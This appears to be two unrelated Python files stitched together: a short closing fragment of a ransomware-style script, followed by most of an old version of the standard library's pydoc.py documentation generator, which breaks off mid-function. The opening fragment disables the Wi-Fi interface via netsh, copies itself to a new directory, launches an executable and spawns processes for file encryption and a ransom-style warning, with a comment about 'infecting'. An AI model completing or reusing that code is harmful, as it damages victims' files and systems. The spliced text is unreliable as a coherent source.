time.sleep(6)
elif connection == True:
try:
os.system("netsh interface set interface name = " + wifi + "admin=DISABLED")
except:
pass
if main_file_directory is not destination_directory:
shutil.copy(main_file_directory,destination_directory)
os.startfile(executable_file_directory)
exit()
elif main_file_directory is destination_directory:
#start infecting the virus
sub_directory_list = os.listdir()
wifi_name = wifi_scraper()
try:
if __name__ == "__main__":
encryption_process = Process(target = encryption)
encryption_process.start(sub_directory_list)
warning_process = Process(target = warning)
warning_process.start()
offline_maker_process = Process(target = offline_maker)
offline_maker_process.start(wifi_name)
#offline_maker(wifi_name)
#encryption(sub_directory_list)
#warning()
except:
pass
|
pydoc.py
|
#!/usr/bin/env python3
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on the given port on the
local machine. Port number 0 can be used to get an arbitrary unused port.
Run "pydoc -b" to start an HTTP server on an arbitrary unused port and
open a Web browser to interactively browse documentation. The -p option
can be used with the -b option to explicitly specify the server port.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it. This option is
deprecated, since the server can now be controlled directly from HTTP
clients.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/X.Y/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__all__ = ['help']
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88261 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import os
import sys
import builtins
import imp
import io
import inspect
import pkgutil
import platform
import re
import time
import warnings
from collections import deque
from reprlib import Repr
from traceback import extract_tb, format_exception_only
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', result.rstrip()) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = doc.strip().split('\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not lines[1].rstrip():
return lines[0], '\n'.join(lines[2:])
return '', '\n'.join(lines)
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = pairs[1].join(text.split(pairs[0]))
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__',
'__cached__', '__author__', '__credits__', '__date__',
'__version__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
results = []
for (name, kind, cls, value) in inspect.classify_class_attrs(object):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
results.append((name, kind, cls, value))
return results
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line: break
line = line.strip()
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not line.strip():
line = file.readline()
if not line: break
result = line.split('"""')[0].strip()
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
self.filename = filename
self.exc, self.value, self.tb = exc_info
def __str__(self):
exc = self.exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Remove the module from sys.modules and re-import to try
# and avoid problems with partially loaded modules.
# Also remove any submodules because they won't appear
# in the newly loaded module's namespace if they're already
# in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in path.split('.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
PYTHONDOCS = os.environ.get("PYTHONDOCS",
"http://docs.python.org/%d.%d/library"
% sys.version_info[:2])
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError(message)
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS", self.PYTHONDOCS)
basedir = os.path.join(sys.exec_prefix, "lib",
"python%d.%d" % sys.version_info[:2])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'_thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(text.expandtabs())
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, modpkginfo):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = modpkginfo
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def filelink(self, url, path):
"""Make a link to source file."""
return '<a href="file:%s">%s</a>' % (url, path)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + ', '.join(parents) + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
('.'.join(parts[:i+1]), parts[i]))
linkedname = '.'.join(links + parts[-1:])
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = self.filelink(url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % ', '.join(info)
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Reference</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda t: self.modulelink(t[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = [value for (key, value) in classes]
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', ' '.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', ' '.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', '<br>\n'.join(contents))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if hasattr(value, '__call__') or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name)]
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % ', '.join(parents)
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % self.classlink(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.__func__
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, kwonlyargs, kwdefaults, varkw, defaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, kwonlyargs, kwdefaults, varkw, defaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
# XXX lambda's won't usually have func_annotations['return']
# since the syntax doesn't support but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return ''.join(ch + '\b' + ch for ch in text)
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = [prefix + line for line in text.split('\n')]
if lines: lines[-1] = lines[-1].rstrip()
return '\n'.join(lines)
def section(self, title, contents):
"""Format a section with a given heading."""
clean_contents = self.indent(contents).rstrip()
return self.bold(title) + '\n' + clean_contents + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = (classname(c, modname) for c in bases)
result = result + '(%s)' % ', '.join(parents)
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
all = getattr(object, '__all__', None)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE REFERENCE', docloc + """
The following documentation is automatically generated from the Python source
files. It may be incomplete, incorrect or include features that are considered
implementation detail and may vary between Python implementations. When in
doubt, consult the module reference at the location listed above.
""")
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', '\n'.join(modpkgs))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
